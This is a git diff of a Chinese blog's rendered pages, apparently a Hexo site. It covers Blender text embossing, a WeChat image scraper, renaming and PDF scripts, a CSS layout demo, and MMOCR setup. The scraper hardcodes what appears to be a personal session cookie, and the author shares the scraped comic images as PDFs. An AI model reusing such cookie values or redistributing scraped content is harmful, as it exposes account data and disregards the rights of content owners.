    bpy.ops.object.convert(target="MESH")

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.dissolve_limited()

    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
    bpy.ops.mesh.extrude_region_move(TRANSFORM_OT_translate={"value":(0, 0, 0.3)})
    bpy.ops.object.editmode_toggle()

    bpy.ops.mesh.primitive_cube_add()
    cube_obj = bpy.context.object

    cube_obj.scale[0:3] = [2.5, 1.2, 0.25]

    cube_material = bpy.data.materials.new(name="Material")
    cube_material.use_nodes = True
    nodes = cube_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (0, 0, 0, 1)

    cube_obj.data.materials.append(cube_material)

    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj
    bpy.ops.object.modifier_apply(modifier="Boolean")

    bpy.ops.object.transform_apply()

    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
    cube_modifier_bevel.width = 0.01
    cube_modifier_bevel.segments = 1
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    bpy.ops.export_scene.gltf(filepath=os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './outputs/1')))

    Easy Method to Emboss Your Text or Logo | How To Create Raised Letters | 3D Text Effects In Blender

    emmmm 差不多就是把上一个的 Boolean 中的 DIfference 改为 UNION。如果有破,要自己修复:

    png

    @@ -4417,6 +4415,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Book-\345\246\202\346\236\234\346\255\267\345\217\262\346\230\257\344\270\200\347\276\244\345\226\265/index.html" "b/posts/Book-\345\246\202\346\236\234\346\255\267\345\217\262\346\230\257\344\270\200\347\276\244\345\226\265/index.html" index d66b476ea7..48f9dbf6b6 100644 --- "a/posts/Book-\345\246\202\346\236\234\346\255\267\345\217\262\346\230\257\344\270\200\347\276\244\345\226\265/index.html" +++ "b/posts/Book-\345\246\202\346\236\234\346\255\267\345\217\262\346\230\257\344\270\200\347\276\244\345\226\265/index.html" @@ -44,8 +44,6 @@ - - @@ -1446,17 +1444,17 @@

    列表

    输出

    爬虫

    ​ 将上述的网址存到一个列表中:

    -
    import re

    # 给定的 Markdown 文本
    markdown_text = """
    1. [如果历史是一群喵](https://mp.weixin.qq.com/s/WVwlW3bhcirBSn2KjsMEYA)
    2. [如果历史是一群喵 | 祖先喵们的统一战争](https://mp.weixin.qq.com/s/HwkfqalZD7Ugvpt5lcPyuQ)
    3. [吃饭穿衣,竟然都是皇上教的!](https://mp.weixin.qq.com/s/MRvf9c2_8RPX8ouSaNiP1Q)
    4. [他年少丧父,被迫子承父业,最后靠湿身建立了一个国家](https://mp.weixin.qq.com/s/l-nWXU45sku88ML4NCjn7Q)
    5. [天下都是我家哒!](https://mp.weixin.qq.com/s/PVl-eHCmZSMHLQhm_pRAvw)
    6. [跟你讲一下三千多年前的狗血剧](https://mp.weixin.qq.com/s/VoNhyDXoy8Yg-cBCzDcdzg)
    ...
    """

    # 使用正则表达式提取所有 URL
    urls = re.findall(r'\[.*?\]\((https?://[^\s]+)\)', markdown_text)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    import re

    # 给定的 Markdown 文本
    markdown_text = """
    1. [如果历史是一群喵](https://mp.weixin.qq.com/s/WVwlW3bhcirBSn2KjsMEYA)
    2. [如果历史是一群喵 | 祖先喵们的统一战争](https://mp.weixin.qq.com/s/HwkfqalZD7Ugvpt5lcPyuQ)
    3. [吃饭穿衣,竟然都是皇上教的!](https://mp.weixin.qq.com/s/MRvf9c2_8RPX8ouSaNiP1Q)
    4. [他年少丧父,被迫子承父业,最后靠湿身建立了一个国家](https://mp.weixin.qq.com/s/l-nWXU45sku88ML4NCjn7Q)
    5. [天下都是我家哒!](https://mp.weixin.qq.com/s/PVl-eHCmZSMHLQhm_pRAvw)
    6. [跟你讲一下三千多年前的狗血剧](https://mp.weixin.qq.com/s/VoNhyDXoy8Yg-cBCzDcdzg)
    ...
    """

    # 使用正则表达式提取所有 URL
    urls = re.findall(r'\[.*?\]\((https?://[^\s]+)\)', markdown_text)

    ​ 从 利用Python爬取公众号上的图片(附源码) 抄一个代码!然后一阵暴改!

    -
    from tqdm import tqdm
    import requests
    from bs4 import BeautifulSoup
    import time
    import random
    import os

    headers = {
    'cookie':'pgv_pvid=6670082751; RK=WMxp6iw+3H; ptcz=831e2d5114bbf9b46ee7956fedb62717ee910417ecd992f3e0027f034213caf1; o_cookie=2925851543; pac_uid=1_2925851543; iip=0; tvfe_boss_uuid=94828b35f56c4131; LW_uid=01d6E8a1d0T8Y6S87134I123O2; eas_sid=J116c8t1G078b6f8N1u4m24059; LW_sid=6166y891k1d2s4h7v9M5A8K6e8; rewardsn=; wxtokenkey=777; wwapp.vid=; wwapp.cst=; wwapp.deviceid=',
    'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.48'
    }

    index = 0

    for url in urls:
    index += 1
    print("第 " + str(index) + ' 章')
    try:
    response = requests.get(url, headers=headers)
    # print(response.status_code) # 打印响应状态码
    # 获取网页数据
    html = response.text

    soup = BeautifulSoup(html, 'html.parser')
    img_list = soup.find_all('img')
    except Exception as e:
    print(f"{index}:错误 - {str(e)}")

    for img_url in tqdm(img_list):
    try:
    name = str(img_list.index(img_url))
    # print(img_url)
    img_link = img_url.get('data-src')
    if img_link != None:
    # print(img_link)
    response2 = requests.get(img_link)
    # 图片是二进制数据,获取要用content,文本文件用text
    img_content = response2.content
    # 设置休眠时间,防止速度过快被封
    time.sleep(random.uniform(3, 5))
    # 保存文件
    folder_path = './如果历史是一群喵/' + '第 '+ str(index) + ' 章'
    if not os.path.exists(folder_path):
    # 如果文件夹不存在,则创建它
    os.makedirs(folder_path)
    with open(folder_path + '/' + name + '.' + img_link.split('=')[-1],'wb+') as f:
    f.write(img_content)
    f.close()
    # print(f'第 {name} 张图片下载成功')
    except Exception as e:
    print('第 '+ str(index) + ' 章:错误:' + str(e))
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    from tqdm import tqdm
    import requests
    from bs4 import BeautifulSoup
    import time
    import random
    import os

    headers = {
    'cookie':'pgv_pvid=6670082751; RK=WMxp6iw+3H; ptcz=831e2d5114bbf9b46ee7956fedb62717ee910417ecd992f3e0027f034213caf1; o_cookie=2925851543; pac_uid=1_2925851543; iip=0; tvfe_boss_uuid=94828b35f56c4131; LW_uid=01d6E8a1d0T8Y6S87134I123O2; eas_sid=J116c8t1G078b6f8N1u4m24059; LW_sid=6166y891k1d2s4h7v9M5A8K6e8; rewardsn=; wxtokenkey=777; wwapp.vid=; wwapp.cst=; wwapp.deviceid=',
    'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.48'
    }

    index = 0

    for url in urls:
    index += 1
    print("第 " + str(index) + ' 章')
    try:
    response = requests.get(url, headers=headers)
    # print(response.status_code) # 打印响应状态码
    # 获取网页数据
    html = response.text

    soup = BeautifulSoup(html, 'html.parser')
    img_list = soup.find_all('img')
    except Exception as e:
    print(f"{index}:错误 - {str(e)}")

    for img_url in tqdm(img_list):
    try:
    name = str(img_list.index(img_url))
    # print(img_url)
    img_link = img_url.get('data-src')
    if img_link != None:
    # print(img_link)
    response2 = requests.get(img_link)
    # 图片是二进制数据,获取要用content,文本文件用text
    img_content = response2.content
    # 设置休眠时间,防止速度过快被封
    time.sleep(random.uniform(3, 5))
    # 保存文件
    folder_path = './如果历史是一群喵/' + '第 '+ str(index) + ' 章'
    if not os.path.exists(folder_path):
    # 如果文件夹不存在,则创建它
    os.makedirs(folder_path)
    with open(folder_path + '/' + name + '.' + img_link.split('=')[-1],'wb+') as f:
    f.write(img_content)
    f.close()
    # print(f'第 {name} 张图片下载成功')
    except Exception as e:
    print('第 '+ str(index) + ' 章:错误:' + str(e))

    格式化

    ​ 这里手工洗了一下数据,把部分章节开头的 .gif 图片替换成了 .jpeg 的格式,162 章后的文件名后缀有问题,也进行了修改。

    -
    import os

    def rename_files_in_folder(folder_path):
    # 遍历文件夹中的所有文件
    for filename in os.listdir(folder_path):
    # 获取完整文件路径
    old_file = os.path.join(folder_path, filename)

    if os.path.isfile(old_file):
    # 如果文件后缀是 .appmsg,改为 .jpeg
    if filename.endswith('.appmsg'):
    new_file = os.path.join(folder_path, filename.replace('.appmsg', '.jpeg'))
    os.rename(old_file, new_file)

    # 如果文件后缀是 .1,改为 .gif
    elif filename.endswith('.1'):
    new_file = os.path.join(folder_path, filename.replace('.1', '.gif'))
    os.rename(old_file, new_file)

    # 使用示例
    folder_path = r'./如果历史是一群喵/第 184 章' # 替换为目标文件夹的路径
    rename_files_in_folder(folder_path)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    import os

    def rename_files_in_folder(folder_path):
    # 遍历文件夹中的所有文件
    for filename in os.listdir(folder_path):
    # 获取完整文件路径
    old_file = os.path.join(folder_path, filename)

    if os.path.isfile(old_file):
    # 如果文件后缀是 .appmsg,改为 .jpeg
    if filename.endswith('.appmsg'):
    new_file = os.path.join(folder_path, filename.replace('.appmsg', '.jpeg'))
    os.rename(old_file, new_file)

    # 如果文件后缀是 .1,改为 .gif
    elif filename.endswith('.1'):
    new_file = os.path.join(folder_path, filename.replace('.1', '.gif'))
    os.rename(old_file, new_file)

    # 使用示例
    folder_path = r'./如果历史是一群喵/第 184 章' # 替换为目标文件夹的路径
    rename_files_in_folder(folder_path)

    ​ 将爬虫得到的各个图片四周填充白色,使其长宽比与 A4 纸大小一致:

    -
    import os
    import re
    from tqdm import tqdm
    from PIL import Image

    load_path = "./如果历史是一群喵"
    save_path = "./如果历史是一群喵 resized"

    # A4 纵向尺寸在 72 DPI 下的像素大小
    A4_width = 595
    A4_height = 840
    A4_aspect_ratio = A4_width / A4_height

    item_list = os.listdir(load_path)
    item_list.sort(key=lambda x: int(re.search(r'第 (\d+) 章', x).group(1)))

    # 遍历顶层子文件夹
    for item in item_list:
    item_path = os.path.join(load_path, item)
    print(item)
    if os.path.isdir(item_path):
    # 自定义排序函数,提取文件名中的数字部分并按数字排序
    file_list = os.listdir(item_path)
    file_list.sort(key=lambda x: int(re.match(r"(\d+)", x).group(0)))
    # 找到第一个后缀不是 '.jpeg' 的文件,移除该元素及之后的所有元素
    for i, file in enumerate(file_list):
    if not file.endswith('.jpeg'):
    file_list = file_list[:i] # 切片操作,保留列表中 i 之前的元素
    break
    # 创建一个 pdf 对象
    pdf = FPDF()
    for image_file in tqdm(file_list):
    image = Image.open(os.path.join(item_path, image_file))
    # 获取原始图片的宽度和高度
    original_width, original_height = image.size

    # 计算新尺寸比例,保持宽高比不变
    aspect_ratio = original_width / original_height

    # 根据宽高比决定如何调整图片
    if aspect_ratio > A4_aspect_ratio:
    # 图片宽度超出比例限制,调整宽度为 A4 宽度,计算高度
    new_width = A4_width
    new_height = int(new_width / aspect_ratio)
    else:
    # 图片高度超出比例限制,调整高度为 A4 高度,计算宽度
    new_height = A4_height
    new_width = int(new_height * aspect_ratio)

    # 调整图片大小
    resized_image = image.resize((new_width, new_height))

    # 创建一个白色的 A4 背景图像
    background = Image.new('RGB', (A4_width, A4_height), (255, 255, 255))
    # 计算将图片居中放置在 A4 背景中的位置
    left = (A4_width - new_width) // 2
    top = (A4_height - new_height) // 2

    # 将调整后的图片粘贴到背景图像上
    background.paste(resized_image, (left, top))
    # 获取图片的宽度和高度
    width, height = background.size

    folder_path = os.path.join(os.path.join(save_path, item))
    if not os.path.exists(folder_path):
    # 如果文件夹不存在,则创建它
    os.makedirs(folder_path)
    background.save(os.path.join(folder_path, image_file), format="JPEG", quality=80)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    import os
    import re
    from tqdm import tqdm
    from PIL import Image

    load_path = "./如果历史是一群喵"
    save_path = "./如果历史是一群喵 resized"

    # A4 纵向尺寸在 72 DPI 下的像素大小
    A4_width = 595
    A4_height = 840
    A4_aspect_ratio = A4_width / A4_height

    item_list = os.listdir(load_path)
    item_list.sort(key=lambda x: int(re.search(r'第 (\d+) 章', x).group(1)))

    # 遍历顶层子文件夹
    for item in item_list:
    item_path = os.path.join(load_path, item)
    print(item)
    if os.path.isdir(item_path):
    # 自定义排序函数,提取文件名中的数字部分并按数字排序
    file_list = os.listdir(item_path)
    file_list.sort(key=lambda x: int(re.match(r"(\d+)", x).group(0)))
    # 找到第一个后缀不是 '.jpeg' 的文件,移除该元素及之后的所有元素
    for i, file in enumerate(file_list):
    if not file.endswith('.jpeg'):
    file_list = file_list[:i] # 切片操作,保留列表中 i 之前的元素
    break
    # 创建一个 pdf 对象
    pdf = FPDF()
    for image_file in tqdm(file_list):
    image = Image.open(os.path.join(item_path, image_file))
    # 获取原始图片的宽度和高度
    original_width, original_height = image.size

    # 计算新尺寸比例,保持宽高比不变
    aspect_ratio = original_width / original_height

    # 根据宽高比决定如何调整图片
    if aspect_ratio > A4_aspect_ratio:
    # 图片宽度超出比例限制,调整宽度为 A4 宽度,计算高度
    new_width = A4_width
    new_height = int(new_width / aspect_ratio)
    else:
    # 图片高度超出比例限制,调整高度为 A4 高度,计算宽度
    new_height = A4_height
    new_width = int(new_height * aspect_ratio)

    # 调整图片大小
    resized_image = image.resize((new_width, new_height))

    # 创建一个白色的 A4 背景图像
    background = Image.new('RGB', (A4_width, A4_height), (255, 255, 255))
    # 计算将图片居中放置在 A4 背景中的位置
    left = (A4_width - new_width) // 2
    top = (A4_height - new_height) // 2

    # 将调整后的图片粘贴到背景图像上
    background.paste(resized_image, (left, top))
    # 获取图片的宽度和高度
    width, height = background.size

    folder_path = os.path.join(os.path.join(save_path, item))
    if not os.path.exists(folder_path):
    # 如果文件夹不存在,则创建它
    os.makedirs(folder_path)
    background.save(os.path.join(folder_path, image_file), format="JPEG", quality=80)

    输出 pdf

    ​ 将上述图片输出成 pdf:

    -
    from fpdf import FPDF
    import re
    import os
    from tqdm import tqdm

    load_path = './如果历史是一群喵 resized/'
    save_path = './如果历史是一群喵 pdf/'

    # 将图像文件转换为 PDF
    def images_to_pdf(image_paths, output_pdf_path):
    pdf = FPDF()
    image_paths.sort(key=lambda x: int(re.search(r'(\d+)\.jpeg', x).group(1)))
    # 遍历所有图像文件
    for image_path in image_paths:
    # 添加新的一页
    pdf.add_page()
    # 插入图片,设置为 A4 尺寸的图像(宽度 210mm,高度 297mm)
    pdf.image(image_path, x=0, y=0, w=210, h=297)

    # 输出 PDF 文件
    pdf.output(output_pdf_path)

    for folder in tqdm(os.listdir(load_path)):
    image_folder = os.path.join(load_path, folder)
    image_paths = [os.path.join(image_folder, f) for f in os.listdir(image_folder)]

    output_pdf_path = os.path.join(save_path, folder + '.pdf') # 输出 PDF 的路径
    images_to_pdf(image_paths, output_pdf_path)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    from fpdf import FPDF
    import re
    import os
    from tqdm import tqdm

    load_path = './如果历史是一群喵 resized/'
    save_path = './如果历史是一群喵 pdf/'

    # 将图像文件转换为 PDF
    def images_to_pdf(image_paths, output_pdf_path):
    pdf = FPDF()
    image_paths.sort(key=lambda x: int(re.search(r'(\d+)\.jpeg', x).group(1)))
    # 遍历所有图像文件
    for image_path in image_paths:
    # 添加新的一页
    pdf.add_page()
    # 插入图片,设置为 A4 尺寸的图像(宽度 210mm,高度 297mm)
    pdf.image(image_path, x=0, y=0, w=210, h=297)

    # 输出 PDF 文件
    pdf.output(output_pdf_path)

    for folder in tqdm(os.listdir(load_path)):
    image_folder = os.path.join(load_path, folder)
    image_paths = [os.path.join(image_folder, f) for f in os.listdir(image_folder)]

    output_pdf_path = os.path.join(save_path, folder + '.pdf') # 输出 PDF 的路径
    images_to_pdf(image_paths, output_pdf_path)

    ​ 得到最终文件:如果历史是一群喵 pdf_免费高速下载|百度网盘-分享无限制

    @@ -1675,6 +1673,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/CSS-position-absolute/index.html b/posts/CSS-position-absolute/index.html index f3a7d1f9cd..fca7c53412 100644 --- a/posts/CSS-position-absolute/index.html +++ b/posts/CSS-position-absolute/index.html @@ -44,8 +44,6 @@ - - @@ -479,7 +477,7 @@

    正文

    ​ 源代码:

    -
    <style>
    .desc {
    position: absolute;
    width: 100%;
    background: #ffffffa0;
    bottom: 0px;
    margin: 0 auto;
    text-align: center;
    color: #222;
    }
    </style>

    <div style="margin: 0 auto; width: 60%; aspect-ratio: 0.8; position: relative; background: #ffdfdf; box-shadow: 4px 4px 5px rgba(0, 0, 0, 0.5);">
    <div style="position: absolute; left: 0%; top: 0%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="张飞" src="ZhangFei.webp"/>
    <p class="desc">张飞</p>
    </div>
    <div style="position: absolute; left: 25%; top: 0%; width: 50%;">
    <img style="margin: 0; max-width: 100%;" alt="曹操" src="CaoCao.webp"/>
    <p class="desc">曹操</p>
    </div>
    <div style="position: absolute; left: 75%; top: 0%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="马超" src="MaChao.webp"/>
    <p class="desc">马超</p>
    </div>
    <div style="position: absolute; left: 0%; top: 40%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="赵云" src="ZhaoYun.webp"/>
    <p class="desc">赵云</p>
    </div>
    <div style="position: absolute; left: 25%; top: 40%; width: 50%;">
    <img style="margin: 0; max-width: 100%;" alt="关羽" src="GuanYu.webp"/>
    <p class="desc">关羽</p>
    </div>
    <div style="position: absolute; left: 75%; top: 40%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="黄忠" src="HuangZhong.webp"/>
    <p class="desc">黄忠</p>
    </div>
    <div style="position: absolute; left: 25%; top: 60%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    <div style="position: absolute; left: 50%; top: 60%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    <div style="position: absolute; left: 0%; top: 80%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    <div style="position: absolute; left: 75%; top: 80%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    </div>

    <div style="margin: -50px 0 0 -80px; width: calc(100% + 160px); height: 80px; background: #00000020;"></div>
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    <style>
    .desc {
    position: absolute;
    width: 100%;
    background: #ffffffa0;
    bottom: 0px;
    margin: 0 auto;
    text-align: center;
    color: #222;
    }
    </style>

    <div style="margin: 0 auto; width: 60%; aspect-ratio: 0.8; position: relative; background: #ffdfdf; box-shadow: 4px 4px 5px rgba(0, 0, 0, 0.5);">
    <div style="position: absolute; left: 0%; top: 0%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="张飞" src="ZhangFei.webp"/>
    <p class="desc">张飞</p>
    </div>
    <div style="position: absolute; left: 25%; top: 0%; width: 50%;">
    <img style="margin: 0; max-width: 100%;" alt="曹操" src="CaoCao.webp"/>
    <p class="desc">曹操</p>
    </div>
    <div style="position: absolute; left: 75%; top: 0%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="马超" src="MaChao.webp"/>
    <p class="desc">马超</p>
    </div>
    <div style="position: absolute; left: 0%; top: 40%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="赵云" src="ZhaoYun.webp"/>
    <p class="desc">赵云</p>
    </div>
    <div style="position: absolute; left: 25%; top: 40%; width: 50%;">
    <img style="margin: 0; max-width: 100%;" alt="关羽" src="GuanYu.webp"/>
    <p class="desc">关羽</p>
    </div>
    <div style="position: absolute; left: 75%; top: 40%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="黄忠" src="HuangZhong.webp"/>
    <p class="desc">黄忠</p>
    </div>
    <div style="position: absolute; left: 25%; top: 60%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    <div style="position: absolute; left: 50%; top: 60%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    <div style="position: absolute; left: 0%; top: 80%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    <div style="position: absolute; left: 75%; top: 80%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    </div>

    <div style="margin: -50px 0 0 -80px; width: calc(100% + 160px); height: 80px; background: #00000020;"></div>
    @@ -697,6 +695,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Course-\345\244\256\347\276\216\303\227\344\270\255\344\274\240\346\270\270\347\240\224\347\244\276 \347\224\265\345\255\220\346\270\270\346\210\217\345\217\262/index.html" "b/posts/Course-\345\244\256\347\276\216\303\227\344\270\255\344\274\240\346\270\270\347\240\224\347\244\276 \347\224\265\345\255\220\346\270\270\346\210\217\345\217\262/index.html" index 2dd5f881a1..f343154792 100644 --- "a/posts/Course-\345\244\256\347\276\216\303\227\344\270\255\344\274\240\346\270\270\347\240\224\347\244\276 \347\224\265\345\255\220\346\270\270\346\210\217\345\217\262/index.html" +++ "b/posts/Course-\345\244\256\347\276\216\303\227\344\270\255\344\274\240\346\270\270\347\240\224\347\244\276 \347\224\265\345\255\220\346\270\270\346\210\217\345\217\262/index.html" @@ -44,17 +44,6 @@ - - - - - - - - - - - @@ -2304,6 +2293,17 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + + + + + + + + + + diff --git "a/posts/Course-\345\251\232\346\201\213 \350\201\214\345\234\272 \344\272\272\346\240\274-\346\255\246\346\261\211\347\220\206\345\267\245\345\244\247\345\255\246/index.html" "b/posts/Course-\345\251\232\346\201\213 \350\201\214\345\234\272 \344\272\272\346\240\274-\346\255\246\346\261\211\347\220\206\345\267\245\345\244\247\345\255\246/index.html" index d31cc8439d..8f3ed751fd 100644 --- "a/posts/Course-\345\251\232\346\201\213 \350\201\214\345\234\272 \344\272\272\346\240\274-\346\255\246\346\261\211\347\220\206\345\267\245\345\244\247\345\255\246/index.html" +++ "b/posts/Course-\345\251\232\346\201\213 \350\201\214\345\234\272 \344\272\272\346\240\274-\346\255\246\346\261\211\347\220\206\345\267\245\345\244\247\345\255\246/index.html" @@ -44,17 +44,6 @@ - - - - - - - - - - - @@ -2714,6 +2703,17 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + + + + + + + + + + diff --git "a/posts/Course-\346\226\207\346\234\254\350\257\206\345\210\253 OCR \347\245\236\345\231\250 MMOCR/index.html" "b/posts/Course-\346\226\207\346\234\254\350\257\206\345\210\253 OCR \347\245\236\345\231\250 MMOCR/index.html" index f37ed179f7..b1dcb64996 100644 --- "a/posts/Course-\346\226\207\346\234\254\350\257\206\345\210\253 OCR \347\245\236\345\231\250 MMOCR/index.html" +++ "b/posts/Course-\346\226\207\346\234\254\350\257\206\345\210\253 OCR \347\245\236\345\231\250 MMOCR/index.html" @@ -44,8 +44,6 @@ - - @@ -657,84 +655,84 @@

    在 conda 创建的虚拟环境中安装 jupyter 以及使用_conda 虚拟环境怎么连接 jupyter-CSDN 博客

    ​ 安装 MMOCR:[Paper-MMOCR-A Comprehensive Toolbox for Text Detection, Recognition and Understanding | Zi-Zi’s Journey](/2024/05/30/Paper-MMOCR-A Comprehensive Toolbox for Text Detection, Recognition and Understanding/)

    ​ 检查安装成功:

    -
    # 检查 Pytorch
    import torch, torchvision
    print('Pytorch 版本', torch.__version__)
    print('CUDA 是否可用',torch.cuda.is_available())
    -
    Pytorch 版本 1.13.1+cu117
    CUDA 是否可用 True
    -
    # 检查 mmcv
    import mmcv
    from mmcv.ops import get_compiling_cuda_version, get_compiler_version
    print('MMCV 版本', mmcv.__version__)
    print('CUDA 版本', get_compiling_cuda_version())
    print('编译器版本', get_compiler_version())
    -
    MMCV 版本 2.1.0
    CUDA 版本 11.7
    编译器版本 MSVC 192930148
    -
    # 检查 mmocr
    import mmocr
    print('mmocr 版本', mmocr.__version__)
    -
    mmocr 版本 1.0.1
    +
    1
    2
    3
    4
    # 检查 Pytorch
    import torch, torchvision
    print('Pytorch 版本', torch.__version__)
    print('CUDA 是否可用',torch.cuda.is_available())
    +
    1
    2
    Pytorch 版本 1.13.1+cu117
    CUDA 是否可用 True
    +
    1
    2
    3
    4
    5
    6
    # 检查 mmcv
    import mmcv
    from mmcv.ops import get_compiling_cuda_version, get_compiler_version
    print('MMCV 版本', mmcv.__version__)
    print('CUDA 版本', get_compiling_cuda_version())
    print('编译器版本', get_compiler_version())
    +
    1
    2
    3
    MMCV 版本 2.1.0
    CUDA 版本 11.7
    编译器版本 MSVC 192930148
    +
    1
    2
    3
    # 检查 mmocr
    import mmocr
    print('mmocr 版本', mmocr.__version__)
    +
    1
    mmocr 版本 1.0.1

    B1 预训练模型预测-文本识别

    ​ 导入工具包:

    -
    from mmocr.apis import MMOCRInferencer

    import cv2

    import matplotlib.pyplot as plt
    %matplotlib inline
    +
    1
    2
    3
    4
    5
    6
    from mmocr.apis import MMOCRInferencer

    import cv2

    import matplotlib.pyplot as plt
    %matplotlib inline

    ​ 载入模型,实例化 MMOCRInferencer,rec='svtr-small' 使用 SVTR 模型进行文本识别:mmocr/configs/textrecog/svtr at main · open-mmlab/mmocr (github.com)

    ​ 下载 https://download.openmmlab.com/mmocr/textrecog/svtr/svtr-small_20e_st_mj/svtr-small_20e_st_mj-35d800d6.pth 并放到合适位置,使用 rec_weights 设定模型位置(如果没有设定,则它会自动下载到一个地方)

    -
    infer = MMOCRInferencer(rec='svtr-small', rec_weights='./models/svtr-small_20e_st_mj-35d800d6.pth')
    -
    Loads checkpoint by local backend from path: ./models/svtr-small_20e_st_mj-35d800d6.pth
    +
    1
    infer = MMOCRInferencer(rec='svtr-small', rec_weights='./models/svtr-small_20e_st_mj-35d800d6.pth')
    +
    1
    Loads checkpoint by local backend from path: ./models/svtr-small_20e_st_mj-35d800d6.pth

    ​ 载入预测图像,就决定是你了:

    png

    ​ 场景文本识别模型只支持裁剪出文本区域的小图的识别。

    -
    img_path = './demo/ILoveGZ.png'
    img_bgr = cv2.imread(img_path)
    plt.imshow(img_bgr[:,:,::-1])
    plt.show()
    +
    1
    2
    3
    4
    img_path = './demo/ILoveGZ.png'
    img_bgr = cv2.imread(img_path)
    plt.imshow(img_bgr[:,:,::-1])
    plt.show()

    png

    ​ 执行预测:

    -
    result = infer(img_path, save_vis=True, return_vis=True)
    +
    1
    result = infer(img_path, save_vis=True, return_vis=True)

    ​ 解析预测结果-文本内容及置信度

    -
    result.keys()
    -
    dict_keys(['predictions', 'visualization'])
    -
    result['predictions']
    -
    [{'rec_texts': ['igz'], 'rec_scores': [0.9166250427563986]}]
    +
    1
    result.keys()
    +
    1
    dict_keys(['predictions', 'visualization'])
    +
    1
    result['predictions']
    +
    1
    [{'rec_texts': ['igz'], 'rec_scores': [0.9166250427563986]}]

    ​ 解析预测结果-可视化:

    -
    plt.imshow(result['visualization'][0])
    plt.show()
    +
    1
    2
    plt.imshow(result['visualization'][0])
    plt.show()

    png

    B2 预训练模型预测-文字区域检测

    ​ 导入工具包:

    -
    from mmocr.apis import MMOCRInferencer

    import cv2
    import numpy as np

    import matplotlib.pyplot as plt
    %matplotlib inline
    +
    1
    2
    3
    4
    5
    6
    7
    from mmocr.apis import MMOCRInferencer

    import cv2
    import numpy as np

    import matplotlib.pyplot as plt
    %matplotlib inline

    ​ 载入模型,实例化 MMOCRInferencer,det='textsnake' 使用 Textsnake 模型进行文本识别:[文本检测模型 — MMOCR 1.0.1 文档](https://github.com/open-mmlab/mmocr/tree/main/configs/textrecog/svtr)。

